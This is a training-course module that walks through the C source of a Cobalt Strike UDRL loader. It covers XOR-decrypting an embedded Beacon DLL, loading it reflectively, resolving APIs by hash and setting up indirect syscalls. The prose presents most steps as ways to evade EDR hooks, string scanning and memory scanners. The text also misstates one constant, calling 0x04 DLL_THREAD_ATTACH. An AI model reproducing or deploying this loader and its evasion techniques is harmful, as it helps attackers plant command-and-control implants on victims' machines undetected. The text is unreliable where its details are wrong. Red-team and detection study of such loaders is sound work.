Module 5: The UDRL Loader Walkthrough
A line-by-line analysis of Crystal-Loaders' udrl/src/loader.c — the single C source file that decrypts, loads, and launches Beacon.
Module Objective
This is the core module of the course. We walk through every step of the actual loader.c source code: from extracting encrypted resources, through PE loading with LibTCG primitives, to the three-call Beacon initialization protocol. By the end you will understand exactly how a Crystal-Loaders UDRL turns a raw encrypted blob into a running Cobalt Strike Beacon.
1. File Overview
The loader is a single C source file compiled with MinGW into position-independent code. It has no standard C runtime — every external function is resolved at runtime through Crystal Palace's DFR (Dynamic Function Resolution) mechanism.
Include Headers
The file includes four headers, each providing a distinct capability layer:
C - loader.c includes#include <windows.h>
#include "beacon.h" // BUD structures from Cobalt Strike
#include "gate.h" // LibGate indirect syscalls
#include "tcg.h" // LibTCG PE loading primitives
Header Responsibilities
| Header | Provides |
|---|---|
windows.h | Standard Windows type definitions (LPVOID, DWORD, BOOL, etc.) |
beacon.h | Cobalt Strike BUD structures: USER_DATA, SYSCALL_API, RTL_API, ALLOCATED_MEMORY |
gate.h | LibGate indirect syscall stubs and resolution functions |
tcg.h | LibTCG PE primitives: ParseDLL, LoadDLL, ProcessImports, EntryPoint (note: FixSectionPermissions is defined locally in loader.c, not in tcg.h) |
BOF-Style DLL Imports
Instead of normal import table entries (which would require an IAT and break position independence), the loader declares every external function using DECLSPEC_IMPORT with the LIBRARY$Function naming convention. Crystal Palace's DFR rewrites these at link time into hash-based runtime resolution calls.
C - BOF-style importsDECLSPEC_IMPORT LPVOID WINAPI KERNEL32$VirtualAlloc(LPVOID, SIZE_T, DWORD, DWORD);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$VirtualProtect(LPVOID, SIZE_T, DWORD, PDWORD);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$VirtualFree(LPVOID, SIZE_T, DWORD);
DECLSPEC_IMPORT int MSVCRT$strncmp(const char *, const char *, size_t);
Why BOF-Style?
This naming convention originates from Cobalt Strike's Beacon Object Files (BOFs). The LIBRARY$Function pattern tells the Crystal Palace linker to replace each call site with an invocation of resolve(LIBRARY_HASH, Function_HASH). The result: the compiled PIC blob has zero IAT entries and resolves every API call at runtime through PEB walking and EAT parsing.
Key Defines
C - defines#define NTDLL_HASH 0x3CFA685D // ROR13 hash of "ntdll.dll"
#define memset(x,y,z) __stosb((PBYTE)(x),(BYTE)(y),(SIZE_T)(z))
#define GETRESOURCE(x) (char *)&x
Define Breakdown
| Define | Purpose |
|---|---|
NTDLL_HASH | Pre-computed ROR13 hash of the string "ntdll.dll" — used by ResolveSyscalls to find ntdll without string comparison |
memset | Macro replacing standard memset with the compiler intrinsic __stosb — avoids linking to the C runtime |
GETRESOURCE | Casts a zero-length array (section marker) to a char *, giving access to the length-prefixed data that Crystal Palace linked into that section |
2. Embedded Resources
Crystal Palace links the encrypted Beacon DLL and XOR key into named PE sections at build time. The loader accesses them through zero-length array markers — a technique that produces no data in the object file but provides a symbol pointing to the start of the section.
C - section markers// Zero-length arrays in custom sections — Crystal Palace fills these at link time
char _DLL_[0] __attribute__((section("dll")));
char _KEY_[0] __attribute__((section("key")));
The RESOURCE Structure
Every embedded resource is stored as a length-prefixed byte array. The first field is an int length, followed by a char value[] flexible array member. This structure lets the loader know exactly how many bytes to process without relying on sentinel values or section headers.
C - RESOURCE typedeftypedef struct {
int length;
char value[];
} RESOURCE;
Crystal Palace Link Pipeline
raw bytes
128-bit key
4-byte DWORD
"dll" section
When Crystal Palace's spec file processes push $DLL / xor $KEY / preplen / link "dll", the pipeline executes these four steps:
Spec Pipeline Steps
| Step | Spec Command | Action |
|---|---|---|
| 1 | push $DLL | Push the raw Beacon DLL bytes onto the spec stack |
| 2 | xor $KEY | XOR the top-of-stack with a generated 128-bit key |
| 3 | preplen | Prepend a 4-byte length field (creating the RESOURCE structure) |
| 4 | link "dll" | Link the result into the "dll" section of the final PIC blob |
3. The go() Entry Point — Full Walkthrough
The go() function is the loader's entry point — the first code that executes when the PIC blob runs. It orchestrates the entire loading sequence in nine discrete steps. Each step has a single responsibility and builds on the previous one.
go() Execution Pipeline
Step 1
Step 2
Step 3
Step 4
Step 5
Step 6-7
Step 8
Step 9
Step 1 — Get Embedded Resources
The loader retrieves pointers to the encrypted Beacon DLL and the XOR key from their respective PE sections using the GETRESOURCE macro.
C - Step 1RESOURCE * dll = (RESOURCE *)GETRESOURCE(_DLL_);
RESOURCE * key = (RESOURCE *)GETRESOURCE(_KEY_);
What GETRESOURCE Returns
GETRESOURCE(_DLL_) expands to (char *)&_DLL_. Since _DLL_ is a zero-length array at the start of the "dll" section, its address points directly to the RESOURCE structure that Crystal Palace linked there. The caller then casts the result to RESOURCE *. The dll->length field gives the encrypted payload size, and dll->value points to the encrypted bytes.
Step 2 — Allocate + XOR Unmask
A fresh RW buffer is allocated for the decrypted Beacon DLL. Each byte of the encrypted payload is XOR'd with the corresponding byte of the rotating key.
C - Step 2// Allocate RW buffer for the decrypted Beacon DLL
PBYTE src = KERNEL32$VirtualAlloc(NULL, dll->length,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// XOR-unmask: each byte of payload XOR'd with rotating key
for (DWORD i = 0; i < dll->length; i++)
src[i] = dll->value[i] ^ key->value[i % key->length];
Key Rotation
The expression i % key->length implements key rotation. The 128-bit (16-byte) key repeats every 16 bytes of the payload. This is a simple XOR cipher — not cryptographically strong, but sufficient to prevent static signature detection of the Beacon DLL on disk and in the PIC blob.
Step 3 — Parse PE
LibTCG's ParseDLL reads the PE headers from the decrypted buffer and populates a DLLDATA structure with section info, import table pointers, relocation data, and entry point offset.
C - Step 3DLLDATA data;
memset(&data, 0, sizeof(DLLDATA));
ParseDLL(src, &data);
DLLDATA Contents
After ParseDLL, the data structure contains everything needed to manually load the DLL: the IMAGE_NT_HEADERS pointer, the section table, import directory RVA, relocation directory RVA, and the AddressOfEntryPoint. The original buffer (src) is still needed as the source of section data.
Step 4 — Allocate + Load DLL
A second allocation provides the final memory region where the Beacon DLL will live. LoadDLL copies sections to their correct virtual offsets, and ProcessImports resolves the Beacon DLL's own import table.
C - Step 4DWORD size = SizeOfDLL(&data);
PBYTE dst = KERNEL32$VirtualAlloc(NULL, size,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
LoadDLL(&data, src, dst);
// Initialize import resolution functions
IMPORTFUNCS funcs;
funcs.loadLibraryA = KERNEL32$LoadLibraryA;
funcs.getProcAddress = KERNEL32$GetProcAddress;
ProcessImports(&funcs, &data, dst);
LibTCG Loading Primitives
| Function | Responsibility |
|---|---|
SizeOfDLL | Returns SizeOfImage from the PE optional header — the total virtual size needed |
LoadDLL | Takes three arguments: DLLDATA, source buffer (src), and destination (dst). Copies each PE section from src to the correct offset in dst, applies base relocations |
ProcessImports | Takes three arguments: an IMPORTFUNCS struct (holding LoadLibraryA and GetProcAddress pointers), DLLDATA, and destination. Walks the import descriptor table, resolves each imported function, patches the IAT |
Step 5 — Initialize BUD (Beacon User Data)
The BUD (Beacon User Data) is a set of structures that the loader passes to Beacon. It provides Beacon with pre-resolved syscall stubs, RTL function pointers, and memory region metadata for sleep masking.
C - Step 5USER_DATA bud;
memset(&bud, 0, sizeof(USER_DATA));
bud.version = COBALT_STRIKE_VERSION; // 0x041100 = CS 4.11
SYSCALL_API syscalls;
memset(&syscalls, 0, sizeof(SYSCALL_API));
bud.syscalls = &syscalls;
RTL_API rtlFunctions;
memset(&rtlFunctions, 0, sizeof(RTL_API));
bud.rtls = &rtlFunctions;
ALLOCATED_MEMORY memory;
memset(&memory, 0, sizeof(ALLOCATED_MEMORY));
bud.allocatedMemory = &memory;
BUD Sub-Structures
| Structure | Field | Purpose |
|---|---|---|
USER_DATA | version | Cobalt Strike version identifier — Beacon uses this for compatibility checks |
SYSCALL_API | bud.syscalls | Contains function pointers for 36 Nt* syscall stubs that Beacon calls instead of using ntdll directly |
RTL_API | bud.rtls | Contains pointers to Rtl* utility functions (rtlDosPathNameToNtPathNameUWithStatus, rtlFreeHeap, and rtlGetProcessHeap) |
ALLOCATED_MEMORY | bud.allocatedMemory | Tracks memory regions so Beacon's sleep mask can encrypt/decrypt them during sleep cycles |
Step 6 — Fix Section Permissions + Track Memory
After loading, all sections are RW. FixSectionPermissions iterates through each PE section and calls VirtualProtect with the correct permission flags. It also populates the ALLOCATED_MEMORY_REGION metadata so Beacon knows the layout of its own memory.
C - Step 6FixSectionPermissions(&data, dst, &memory.AllocatedMemoryRegions[0]);
Section Permission Mapping
| Section | Permission | Windows Constant |
|---|---|---|
.text | Execute + Read | PAGE_EXECUTE_READ |
.rdata | Read Only | PAGE_READONLY |
.data | Read + Write | PAGE_READWRITE |
.pdata | Read Only | PAGE_READONLY |
.reloc | Read Only | PAGE_READONLY |
Why Permissions Matter
Leaving all sections as RWX would work functionally but is a glaring detection indicator. EDR products flag RWX memory regions as suspicious. By applying the correct per-section permissions, the loaded Beacon DLL looks identical to a normally loaded DLL from the perspective of memory scanners.
Step 7 — Set Cleanup Info
The loader tells Beacon how the memory was allocated and whether Beacon should clean it up. This metadata is critical for Beacon's sleep masking — it needs to know the allocation method to correctly free or re-protect memory during sleep.
C - Step 7memory.AllocatedMemoryRegions[0].CleanupInformation.AllocationMethod = METHOD_VIRTUALALLOC;
memory.AllocatedMemoryRegions[0].CleanupInformation.Cleanup = TRUE;
memory.AllocatedMemoryRegions[0].Purpose = PURPOSE_BEACON_MEMORY;
Cleanup Fields
| Field | Value | Meaning |
|---|---|---|
AllocationMethod | METHOD_VIRTUALALLOC | Memory was allocated with VirtualAlloc (as opposed to NtMapViewOfSection or HeapAlloc) |
Cleanup | TRUE | Beacon should free this region when shutting down |
Purpose | PURPOSE_BEACON_MEMORY | This region contains the Beacon DLL itself (not shellcode or other data) |
Step 8 — Resolve Syscalls + RTL Functions
Two resolution functions populate the BUD sub-structures with live function pointers. These pointers allow Beacon to execute syscalls indirectly (through LibGate stubs) and call Rtl* utilities without importing them.
C - Step 8ResolveSyscalls(&syscalls);
ResolveRtlFunctions(&rtlFunctions);
Why Resolve at Load Time?
By resolving all 36 Nt* functions and the Rtl* utilities during loading, Beacon avoids making GetProcAddress calls during operation. Every API call Beacon makes goes through pre-resolved function pointers in the BUD. This eliminates a major detection surface: EDR products that hook GetProcAddress and LdrGetProcedureAddress will never see Beacon's resolution activity.
Step 9 — Get Entry Point, Clean Up, Call Beacon
The final step resolves the Beacon DLL's entry point, frees the decrypted buffer (no longer needed), and makes the three DllMain calls that constitute the Cobalt Strike initialization protocol.
C - Step 9DLLMAIN_FUNC entryPoint = (DLLMAIN_FUNC)EntryPoint(&data, dst);
// Free the decrypted buffer (no longer needed)
KERNEL32$VirtualFree(src, 0, MEM_RELEASE);
// Three DllMain calls — this is the Cobalt Strike protocol:
entryPoint((HINSTANCE)0, DLL_BEACON_USER_DATA, &bud); // Pass BUD to Beacon
entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, NULL); // Standard DLL init
entryPoint((HINSTANCE)GETRESOURCE(go), DLL_BEACON_START, NULL); // Start Beacon
Buffer Cleanup Timing
The decrypted buffer (src) is freed before calling Beacon's entry point. This is intentional: the buffer contains a fully decrypted copy of the Beacon DLL, which would be trivially detectable by a memory scanner. By freeing it before Beacon starts operating, the loader minimizes the window during which a cleartext DLL exists in memory. The loaded copy at dst has proper section permissions and looks like a normally loaded module.
4. The Three DllMain Calls
Unlike a normal DLL that receives a single DLL_PROCESS_ATTACH call, Cobalt Strike Beacon requires three separate DllMain invocations. Each call uses a different fdwReason value and passes different data through the parameters.
Three-Call Initialization Protocol
DLL_BEACON_USER_DATA
reason = 0x0d
DLL_PROCESS_ATTACH
reason = 0x01
DLL_BEACON_START
reason = 0x04
Call-by-Call Breakdown
| Call | fdwReason | hinstDLL | lpReserved | Purpose |
|---|---|---|---|---|
| 1 | DLL_BEACON_USER_DATA (0x0d) | 0 (unused) | &bud | Passes the USER_DATA pointer to Beacon. Beacon stores references to SYSCALL_API, RTL_API, and ALLOCATED_MEMORY for later use. |
| 2 | DLL_PROCESS_ATTACH (0x01) | dst (base address) | NULL | Standard DLL initialization. Beacon sets up internal state, communication channels, and thread-local storage. |
| 3 | DLL_BEACON_START (0x04) | go (loader addr) | NULL | Signals Beacon to begin execution. The go function pointer is passed so Beacon can free the loader's memory region. |
Call 1: DLL_BEACON_USER_DATA (0x0d)
This custom reason code (not a standard Windows constant) tells Beacon's DllMain that the lpReserved parameter contains a USER_DATA*. Beacon casts it and stores the three sub-structure pointers internally. These pointers are used throughout Beacon's lifetime:
- SYSCALL_API — called every time Beacon needs an Nt* function (file I/O, memory operations, thread management)
- RTL_API — called for heap management and string operations
- ALLOCATED_MEMORY — read during every sleep cycle to encrypt/decrypt memory regions
Call 2: DLL_PROCESS_ATTACH (0x01)
This is the standard Windows DLL initialization call. Beacon uses this to perform one-time setup: initialize its configuration parser, set up named pipes or HTTP channels, configure sleep timers, and register exception handlers. The hinstDLL parameter receives the base address (dst) so Beacon knows where it is loaded in memory.
Call 3: DLL_BEACON_START (0x04)
The final call uses DLL_THREAD_ATTACH (0x04) which Beacon repurposes as a start signal. The hinstDLL parameter receives the go function pointer — the address of the loader itself. Beacon stores this address so it can later call VirtualFree on the loader's memory region, erasing the UDRL code from memory after initialization is complete.
Order Matters
The three calls must happen in this exact order. Call 1 must precede Call 2 because Beacon's DLL_PROCESS_ATTACH handler may use the syscall stubs that were passed in Call 1. Call 3 must be last because it starts the Beacon main loop, which never returns — any code after Call 3 will not execute.
5. The resolve() Function
The resolve() function is the bridge between BOF-style import declarations and runtime API resolution. Crystal Palace's DFR mechanism rewrites every KERNEL32$VirtualAlloc call into a resolve(KERNEL32_HASH, VirtualAlloc_HASH) call at link time.
C - resolve()char * resolve(DWORD modHash, DWORD funcHash)
{
PVOID mod = findModuleByHash(modHash);
return findFunctionByHash(mod, funcHash);
}
DFR Resolution Flow
KERNEL32$VirtualAlloc(...)
resolve(K32_HASH, VA_HASH)
findModuleByHash
findFunctionByHash
Resolution Internals
| Function | Mechanism | Returns |
|---|---|---|
findModuleByHash | Walks the PEB's InLoadOrderModuleList, computes ROR13 hash of each DLL name, compares against modHash | Base address of the target DLL |
findFunctionByHash | Parses the DLL's Export Address Table (EAT), computes ROR13 hash of each export name, compares against funcHash | Address of the target function |
No Strings in the Binary
Because every module and function name is converted to a ROR13 hash at compile time, the final PIC blob contains no API name strings whatsoever. Static analysis tools that search for strings like "VirtualAlloc" or "NtAllocateVirtualMemory" will find nothing. The only way to determine what APIs the loader calls is to reverse-engineer the hash values or analyze the code dynamically.
6. ResolveSyscalls() — All 36 Nt* Functions
ResolveSyscalls populates the SYSCALL_API structure with resolved entries for every Nt* function that Beacon supports. Each entry contains both the function address and the syscall number (SSN), enabling LibGate's indirect syscall mechanism.
C - ResolveSyscalls()void ResolveSyscalls(SYSCALL_API * syscalls)
{
PVOID ntdll = findModuleByHash(NTDLL_HASH);
ResolveSyscallEntry(ntdll,
findFunctionByHash(ntdll, NtAllocateVirtualMemory_HASH),
&syscalls->ntAllocateVirtualMemory);
ResolveSyscallEntry(ntdll,
findFunctionByHash(ntdll, NtProtectVirtualMemory_HASH),
&syscalls->ntProtectVirtualMemory);
// ... 34 more Nt* functions
ResolveSyscallEntry(ntdll,
findFunctionByHash(ntdll, NtWaitForMultipleObjects_HASH),
&syscalls->ntWaitForMultipleObjects);
}
ResolveSyscallEntry Internals
Each call to ResolveSyscallEntry does three things:
- Stores the function address in the SYSCALL_API_ENTRY
- Reads the SSN (System Service Number) from the
mov eax, SSNinstruction at the start of the ntdll stub - Locates the
syscallinstruction within the stub for indirect syscall execution
Complete SYSCALL_API — All 36 Nt* Functions
The following table lists every Nt* function in the Beacon SYSCALL_API structure (field names use lowercase nt prefix). These cover all system-level operations that Beacon performs: memory management, process/thread manipulation, file I/O, and object management.
| # | Field Name | Category |
|---|---|---|
| 1 | ntAllocateVirtualMemory | Memory |
| 2 | ntProtectVirtualMemory | Memory |
| 3 | ntFreeVirtualMemory | Memory |
| 4 | ntGetContextThread | Thread |
| 5 | ntSetContextThread | Thread |
| 6 | ntResumeThread | Thread |
| 7 | ntCreateThreadEx | Thread |
| 8 | ntOpenProcess | Process |
| 9 | ntOpenThread | Thread |
| 10 | ntClose | Object |
| 11 | ntCreateSection | Memory |
| 12 | ntMapViewOfSection | Memory |
| 13 | ntUnmapViewOfSection | Memory |
| 14 | ntQueryVirtualMemory | Memory |
| 15 | ntDuplicateObject | Object |
| 16 | ntReadVirtualMemory | Memory |
| 17 | ntWriteVirtualMemory | Memory |
| 18 | ntReadFile | File I/O |
| 19 | ntWriteFile | File I/O |
| 20 | ntCreateFile | File I/O |
| 21 | ntQueueApcThread | Thread |
| 22 | ntCreateProcess | Process |
| 23 | ntOpenProcessToken | Token |
| 24 | ntTestAlert | Thread |
| 25 | ntSuspendProcess | Process |
| 26 | ntResumeProcess | Process |
| 27 | ntQuerySystemInformation | System |
| 28 | ntQueryDirectoryFile | File I/O |
| 29 | ntSetInformationProcess | Process |
| 30 | ntSetInformationThread | Thread |
| 31 | ntQueryInformationProcess | Process |
| 32 | ntQueryInformationThread | Thread |
| 33 | ntOpenSection | Memory |
| 34 | ntAdjustPrivilegesToken | Token |
| 35 | ntDeviceIoControlFile | File I/O |
| 36 | ntWaitForMultipleObjects | Synchronization |
Category Breakdown
| Category | Count | Examples |
|---|---|---|
| Memory | 10 | ntAllocateVirtualMemory, ntProtectVirtualMemory, ntFreeVirtualMemory, ntCreateSection, ntMapViewOfSection, ntOpenSection |
| Thread | 9 | ntGetContextThread, ntSetContextThread, ntResumeThread, ntCreateThreadEx, ntQueueApcThread, ntTestAlert |
| Process | 6 | ntOpenProcess, ntCreateProcess, ntSuspendProcess, ntResumeProcess, ntSetInformationProcess, ntQueryInformationProcess |
| File I/O | 5 | ntReadFile, ntWriteFile, ntCreateFile, ntQueryDirectoryFile, ntDeviceIoControlFile |
| Token | 2 | ntOpenProcessToken, ntAdjustPrivilegesToken |
| Object | 2 | ntClose, ntDuplicateObject |
| System | 1 | ntQuerySystemInformation |
| Synchronization | 1 | ntWaitForMultipleObjects |
Module 5 Quiz: The UDRL Loader Walkthrough
Q1: What value is DLL_BEACON_USER_DATA?
Q2: Why does the loader pass go as the hinstDLL parameter in the DLL_BEACON_START call?
Q3: How many Nt* functions does the SYSCALL_API structure support?